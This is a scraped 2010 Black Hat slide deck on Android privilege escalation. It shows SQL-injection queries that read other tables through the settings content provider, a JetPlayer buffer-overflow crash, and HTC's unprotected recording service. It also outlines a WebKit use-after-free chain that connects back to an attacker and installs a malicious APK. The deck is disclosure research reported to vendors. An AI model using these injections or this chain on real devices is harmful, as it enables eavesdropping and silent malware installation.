The Risk you carry in your Pocket Nils Black Hat Abu Dhabi 2010 - - PowerPoint PPT Presentation

the risk you carry in your pocket nils black hat abu
SMART_READER_LITE
LIVE PREVIEW

The Risk you carry in your Pocket Nils Black Hat Abu Dhabi 2010 - - PowerPoint PPT Presentation

Feb 27, 2023 434 likes •1.09k views

The Risk you carry in your Pocket Nils Black Hat Abu Dhabi 2010 MWR InfoSecurity Who Am I? Head of Research @ MWR Exploiting stuff before Microsoft, Google, Adobe, IBM, Mozilla, Sun, Linux, Apple Pwn2Own Winner 2009

slide-1
SLIDE 1

The Risk you carry in your Pocket Nils Black Hat Abu Dhabi 2010

MWR InfoSecurity

slide-2
SLIDE 2

2

Who Am I?

  • Head of Research @ MWR
  • Exploiting stuff before…
  • Microsoft, Google, Adobe, IBM, Mozilla, Sun, Linux, Apple …
  • Pwn2Own Winner 2009
  • Safari, IE and Firefox
  • Pwn2Own Winner 2010
  • Firefox on Windows 7
slide-3
SLIDE 3
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A

3

slide-4
SLIDE 4
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A

4

slide-5
SLIDE 5

5

Introduction

  • Prerequisites:
  • I have got a WebKit vulnerability
  • Can own:
  • iPhone
  • Palm Web OS
  • Android
  • In Android I am limited to the Sandbox
  • Access to Passwords, Cookies, etc…
slide-6
SLIDE 6

6

Introduction

  • I want more Privileges
  • Record Audio
slide-7
SLIDE 7

7

Introduction

  • Research on Android Phone
  • Not emulator
  • HTC Legend
  • Android 2.1
  • Some apps
slide-8
SLIDE 8

8

What will you see?

  • How to:
  • Audit a Android Handset
  • Additions by Vendors
  • And Carriers
  • Audit Android Applications
  • And how to exploit the findings
slide-9
SLIDE 9

9

Android – Previous Research

  • Kernel vulnerabilities:
  • E.g. sock_sendpage()
  • Local vulnerabilities:
  • E.g. adb root vulnerability
  • Fork bomb
  • Setuid return value not checked
slide-10
SLIDE 10
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A

10

slide-11
SLIDE 11

11

Android – Sandbox

  • Applications are Sandboxed
  • Using Linux User/Group model
  • Every Application == 1 User
  • In theory …
  • Communication through IPC
  • Permissions
slide-12
SLIDE 12

12

Android – Permissions

  • Applications request Permissions
  • AndroidManifest.xml
  • Pre-installed apps
  • Set-up by default in phone
  • User installed apps
  • Granted by User during installation
  • Limited
slide-13
SLIDE 13

13

Android – Permissions

  • Examples:
  • android.permission.CALL_PHONE
  • android.permission.RECORD_AUDIO
  • android.permission.INSTALL_PACKAGE
slide-14
SLIDE 14
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A

14

slide-15
SLIDE 15

15

Android – IPC

  • Inter-Process Communication
  • Used by all of the Apps
  • Core feature on Android
  • Protected using Permissions
  • Mechanism:
  • Services
  • Content-Providers
  • Broadcasts
  • Activities
slide-16
SLIDE 16

16

Android – IPC

  • Supported by /dev/binder
  • Kernel
  • Message routing
  • Permission enforcement
  • Messages in “Parcels”
  • Intents special Parcels
slide-17
SLIDE 17

17

Android – Intent

  • Serialised Data Structure
  • Sent to IPC endpoints
  • Contain Extras
  • Strings
  • Primitive Data Types
  • Arrays thereof
  • Serialisable Java Objects (!)
slide-18
SLIDE 18

18

Android – Service

  • Similar to RPC
  • Class extends Service.class
  • Public methods are exported
  • Called through Intents
  • Defined in AndroidManifest.xml:

<service ¡android:name="BluetoothHeadsetService"> ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡<intent-­‑filter> ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡<action ¡ android:name="android.bluetooth.IBluetoothHeadset" ¡/> ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡</intent-­‑filter> ¡ </service> ¡

slide-19
SLIDE 19

19

Android – Activity

  • Visual Components of Applications
  • Application can instantiate them
  • Sometimes
  • Take arguments in Intents
  • Will run in Implementing Process
  • Permissions!
slide-20
SLIDE 20

20

Android – Content-Providers

  • Provide Access to any Data
  • Emails
  • Pictures
  • Often backed by SQLite Databases
  • Content-Resolver
  • URI: content://browser/bookmarks
  • Standard Interface using Cursors
  • Write and Read Permissions
  • Not using Intents
slide-21
SLIDE 21

21

Android – Broadcast Receivers

  • Register to Broadcast Messages
  • System and Custom
  • Some Messages are protected
  • Others can be forged by anyone
  • Arguments in Broadcasts
  • Intents
  • AndroidManifest.xml
  • Can register dynamically as well
slide-22
SLIDE 22

22

Android – Idea

App2 App3 Service1 App1 Service2 Service Content-Provider Broadcast-Receiver Activity

slide-23
SLIDE 23

23

Android – IPC Exports

  • Default IPC exports
  • Exported by default
  • Content-Providers
  • Export depends on set Filters
  • Services
  • Broadcast Receivers
  • Activities
  • Developers aware of that?
slide-24
SLIDE 24

24

Android – Privilege Escalation

  • Any vulnerability in any exported:-
  • Service, Content-Provider
  • Broadcast Receiver or Activity
  • Can lead to privilege Escalation
  • Gaining privileges of vulnerable App
slide-25
SLIDE 25

25

Android - Applications

  • Many Apps on the phone
  • All in different Processes (Theoretically)
  • Default Android apps
  • ~ 70 apps
  • Vendor apps
  • HTC: ~ 60 apps
  • Plus carrier apps!
  • User installed apps
  • Many more
slide-26
SLIDE 26

26

Android – Processes

  • 1 User  1 App
  • Multiple processes per App
  • Not on real phones though
  • Shared User Id’s
  • Across apps
  • Shared processes
  • Across apps
  • => Shared Permissions and Access-rights
slide-27
SLIDE 27

27

Android – Shared UIDs

  • Applications can Share UserIds
  • If signed by same Developer Key
  • Or Pre-installed
  • Pro:
  • Performance
  • Contra:
  • Security
slide-28
SLIDE 28

28

Android – Shared UIDs

  • Example:
  • com.htc.WeatherWidget
  • Permissions:

android.permissions.GET_ACCOUNTS, android.permission.READ_SYNC_SETTINGS

slide-29
SLIDE 29

29

Android – Shared UIDs

  • Example:
  • com.htc.WeatherWidget
  • Shares “com.htc.rosie.uid.shared” with:

com.htc.FriendStreamWidget, com.htc.TwitterWidget, com.htc.htcmailwidgets, com.htc.NewsReaderWidget, com.htc.StockWidget, com.htc.widget.clockwidget, com.htc.htccalendarwidgets, com.htc.footprints.widgets, com.htc.htccontactwidgets, com.htc.htcmsgwidgets, com.htc.htcsyncwidget, com.htc.launcher, com.htc.WeatherWidget, com.htc.htcsettingwidgets, com.htc.photo.widgets, com.htc.htcbookmarkwidget, com.htc.MusicWidget, com.htc.htcsearchwidgets ¡

slide-30
SLIDE 30

30

Android – Shared UIDs

  • Example:
  • com.htc.WeatherWidget
  • Permissions:

android.permissions.GET_ACCOUNTS, android.permission.READ_SYNC_SETTINGS

slide-31
SLIDE 31

31

Android – Shared UIDs

  • Example:
  • com.htc.WeatherWidget
  • Shared Permissions:

android.permission.INTERNET, com.htc.htctwitter.permission.useprovider, android.permission.ACCESS_FINE_LOCATION,

android.permission.ACCESS_NETWORK_STATE, android.permission.ACCESS_WIFI_STATE, android.permission.GET_ACCOUNTS, android.permission.READ_SYNC_SETTINGS, android.permission.READ_CALENDAR, android.permission.WRITE_CALENDAR, com.google.android.googleapps.permission.GOOGLE_AUTH.mail, android.permission.READ_CONTACTS,

android.permission.CALL_PHONE, android.permission.CALL_PRIVILEGED, android.permission.READ_SMS,

com.htc.socialnetwork.permission.useprovider, android.permission.RECEIVE_BOOT_COMPLETED, android.permission.WRITE_CONTACTS, android.permission.RECEIVE_SMS, android.permission.RECEIVE_MMS, android.permission.SEND_SMS, android.permission.VIBRATE, android.permission.WRITE_SMS, android.permission.CHANGE_NETWORK_STATE, android.permission.READ_PHONE_STATE, android.permission.WAKE_LOCK, android.permission.EXPAND_STATUS_BAR, android.permission.GET_TASKS, android.permission.SET_WALLPAPER, android.permission.SET_WALLPAPER_HINTS, android.permission.WRITE_SETTINGS, com.htc.launcher.permission.READ_SETTINGS, com.htc.launcher.permission.WRITE_SETTINGS, android.permission.SET_TIME_ZONE, android.permission.READ_SYNC_STATS, android.permission.WRITE_EXTERNAL_STORAGE, android.permission.BROADCAST_STICKY,

android.permission.WRITE_SECURE_SETTINGS, android.permission.CHANGE_WIFI_STATE,

android.permission.CLEAR_APP_USER_DATA, android.permission.MODIFY_PHONE_STATE, android.permission.ACCESS_COARSE_LOCATION, android.permission.WRITE_APN_SETTINGS, android.permission.ACCESS_CHECKIN_PROPERTIES, android.permission.BLUETOOTH, android.permission.BLUETOOTH_ADMIN, android.permission.ACCESS_WIMAX_STATE, android.permission.CHANGE_WIMAX_STATE, android.permission.ACCESS_LOCATION_EXTRA_COMMANDS, android.permission.ACCESS_LOCATION, android.permission.ACCESS_ASSISTED_GPS, android.permission.ACCESS_NETWORK_LOCATION, android.permission.ACCESS_GPS, com.android.browser.permission.READ_HISTORY_BOOKMARKS, com.android.browser.permission.WRITE_HISTORY_BOOKMARKS ¡

slide-32
SLIDE 32
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A

32

slide-33
SLIDE 33

33

Android – Vulnerabilities

  • SQL injection in Content Providers
  • When backed by SQLite
  • Allows for arbitrary reads in databases
  • Across processes
  • Can be filtered by Developer
  • Usually is not
  • Not encouraged by Dev Docs
  • Have not found instances of writes to DB
  • No useful functions (load_extension()…)
slide-34
SLIDE 34

34

Android – SQL Injection

final Cursor query( Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder); ¡

slide-35
SLIDE 35

35

Android – SQL Injection

final Cursor query( “content://settings/system”, null, null, null, null); ¡ SELECT * FROM system; ¡

slide-36
SLIDE 36

36

Android – SQL Injection

final Cursor query( “content://settings/system”, null, “_id=1”, null, null); ¡ SELECT * FROM system WHERE _id=1; ¡

slide-37
SLIDE 37

37

Android – SQL Injection

final Cursor query( “content://settings/system”, null, "(select count(*) from secure where \ name='adb_enabled' and value=’0’)=0”, null, null); ¡ SELECT * FROM system WHERE "(select count(*) from secure where name='adb_enabled' and value=’0’)=0; ¡

slide-38
SLIDE 38

38

Android – SQL Injection

final Cursor query( “content://settings/system”, {“_id”}, null, null, null); ¡ SELECT _id FROM system; ¡

slide-39
SLIDE 39

39

Android – SQL Injection

final Cursor query( “content://settings/system”, {“ * FROM bluetooth_devices;”}, null, null, null); ¡ SELECT * FROM bluetooth_devices; FROM system; ¡

slide-40
SLIDE 40

40

Android – SQL Injection

final Cursor query( “content://settings/system”, {“ * FROM sqlite_master;”}, null, null, null); ¡ SELECT * FROM sqlite_master; FROM system; ¡

slide-41
SLIDE 41

41

Android – Vulnerabilities

  • Unprotected services
  • Example:
  • Introduced by HTC
  • com.htc.soundrecorder.RecordingService
  • Not protected
  • Explicitly exported
  • android.permission.RECORD_AUDIO
  • Now useless
  • Every HTC Android phone I checked
slide-42
SLIDE 42

42

Android – Native APIs

  • Java less prone to Memory Corruptions
  • Native APIs more promising for Review
  • Services
  • Directly exporting native API’s
  • Keep a look out for:
  • loadLibrary(“”)
  • And “ native “ keyword
slide-43
SLIDE 43

43

Android – Native APIs

char ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡mJetFilePath[256]; ¡ int ¡JetPlayer::loadFromFile(const ¡char* ¡path) ¡{ ¡ ¡ ¡ ¡ ¡… ¡ ¡ ¡ ¡ ¡strncpy(mJetFilePath, ¡path, ¡strlen(path)); ¡ I/DEBUG ¡ ¡ ¡( ¡ ¡ ¡31): ¡pid: ¡1257, ¡tid: ¡1258 ¡ ¡>>> ¡com.example.test1 ¡<<< ¡ I/DEBUG ¡ ¡ ¡( ¡ ¡ ¡31): ¡signal ¡11 ¡(SIGSEGV), ¡fault ¡addr ¡00000000 ¡ I/DEBUG ¡ ¡ ¡( ¡ ¡ ¡31): ¡ ¡r0 ¡ffffffff ¡ ¡r1 ¡41413000 ¡ ¡r2 ¡00000004 ¡ ¡r3 ¡ffff0ff0 ¡ I/DEBUG ¡ ¡ ¡( ¡ ¡ ¡31): ¡ ¡r4 ¡00000000 ¡ ¡r5 ¡41413000 ¡ ¡r6 ¡afd40328 ¡ ¡r7 ¡00000000 ¡ I/DEBUG ¡ ¡ ¡( ¡ ¡ ¡31): ¡ ¡r8 ¡00100000 ¡ ¡r9 ¡80848121 ¡ ¡10 ¡10000000 ¡ ¡fp ¡00117808 ¡ I/DEBUG ¡ ¡ ¡( ¡ ¡ ¡31): ¡ ¡ip ¡afd20209 ¡ ¡sp ¡100ffe20 ¡ ¡lr ¡afd20201 ¡ ¡pc ¡80849aa4 ¡ ¡cpsr ¡80000030 ¡ I/DEBUG ¡ ¡ ¡( ¡ ¡ ¡31): ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡#00 ¡ ¡pc ¡00049aa4 ¡ ¡/system/lib/libdvm.so ¡ I/DEBUG ¡ ¡ ¡( ¡ ¡ ¡31): ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡#01 ¡ ¡lr ¡afd20201 ¡ ¡/system/lib/libc.so ¡ public ¡boolean ¡loadJetFile(String ¡path) ¡{ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡return ¡native_loadJetFromFile(path); ¡ ¡ ¡ ¡ ¡} ¡

slide-44
SLIDE 44

44

Android – Others

  • Let’s be creative
  • Applications do all kinds of stuff
  • Some of which is stupid :P
  • Example: Skype - App

# ¡ls ¡-­‑al ¡/data/data/com.skype.raider/files/skypekit ¡

  • ­‑rwxrwxrwx ¡ ¡1 ¡0 ¡ ¡2000 ¡ ¡43 ¡/data/data/com.skype.raider/files/skypekit ¡
slide-45
SLIDE 45

45

Android – Others

  • Permissions:

android.permission.DISABLE_KEYGUARD ¡ android.permission.WAKE_LOCK ¡ android.permission.INTERNET ¡ android.permission.GET_ACCOUNTS ¡ android.permission.READ_CONTACTS ¡ android.permission.ACCESS_NETWORK_STATE ¡ android.permission.VIBRATE ¡ android.permission.MODIFY_AUDIO_SETTINGS ¡ android.permission.RECORD_AUDIO ¡ android.permission.READ_PHONE_STATE ¡ android.permission.ACCESS_COARSE_LOCATION ¡ android.permission.GET_TASKS ¡ android.permission.AUTHENTICATE_ACCOUNTS ¡ android.permission.MANAGE_ACCOUNTS ¡ android.permission.READ_SYNC_SETTINGS ¡ android.permission.WRITE_SYNC_SETTINGS ¡ android.permission.GET_ACCOUNTS ¡ android.permission.USE_CREDENTIALS ¡ android.permission.WRITE_SETTINGS ¡ android.permission.WRITE_SECURE_SETTINGS ¡ android.permission.READ_CONTACTS ¡ android.permission.WRITE_CONTACTS ¡ android.permission.READ_SYNC_STATS ¡ android.permission.WRITE_EXTERNAL_STORAGE ¡

slide-46
SLIDE 46

46

Android – Deserialisation

  • Intents contain Extras
  • Can be Serialisable
  • Object type is checked after deserialisation
  • Arbitrary objects can be deserialised
  • In other Processes
  • Across trust boundaries
  • With other permissions
  • Is this exploitable?
  • Sami?
slide-47
SLIDE 47
slide-48
SLIDE 48

48

Android – Permissions

  • Most useful Permission:

INSTALL_PACKAGES

  • On HTC phones granted to the Browser
  • That’s True!
  • Why
  • Flashlite Flash player
  • Installs updates using PackageManager
  • Needs Permissions for that …
slide-49
SLIDE 49

49

Android – Permissions

  • INSTALL_PACKAGES in Browser
  • Impact
  • Malicious Code in Browser
  • Installs arbitrary Applications
  • Without prompting the User
  • Gains arbitrary Permissions
  • For malicious applications
  • No restricted permissions
slide-50
SLIDE 50

50

Android – Demo

  • That should be enough…

Demo Time!

slide-51
SLIDE 51
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A

51

slide-52
SLIDE 52

52

Android Demo - Vulnerability

  • Use-after-free in Browser
  • WebKit
  • Android, Chrome, Safari, iPhone, Symbian, Palm Pre and more
  • Allows for arbitrary code execution
  • HTML5
  • Introduced in Android 2.0
  • 1.5 and 1.6 not vulnerable
  • JavaScript
  • Patched in 2.2
  • No NX , No ASLR
slide-53
SLIDE 53

53

Android - Use-after-free in Browser

Object 1 Object 2 DOM Object

slide-54
SLIDE 54

54

Android - Use-after-free in Browser

Object 2 FREE

slide-55
SLIDE 55

55

Android - Use-after-free in Browser

Object 2 data data data data data data data data data

slide-56
SLIDE 56

56

Android - Use-after-free in Browser

Object 2 data data data data data data data data data (*data)()

slide-57
SLIDE 57

57

Android - Shellcode

  • Steps:
  • 1. Connect back to Attacker
  • 2. Upload malicious APK
  • 3. Install from Browser
  • 4. Pwnage!
slide-58
SLIDE 58

58

Android - Demo

slide-59
SLIDE 59
slide-60
SLIDE 60

60

Android Proof-of-Concept

  • Reported the vulnerability to vendors
  • Patched in 2.2
  • However
  • Any WebKit vulnerability will do
  • Not patched in most Phones
slide-61
SLIDE 61
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A

61

slide-62
SLIDE 62

62

Conclusion

  • Understand the Threats
  • Android Sandbox
  • Fairly Reasonable
  • Many bugs introduced by:
  • Vendors, Carriers
  • 3rd Party Apps
  • Testing and Assurance
  • For Phones
  • Not just OS
slide-63
SLIDE 63
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A

63

slide-64
SLIDE 64

64

Questions?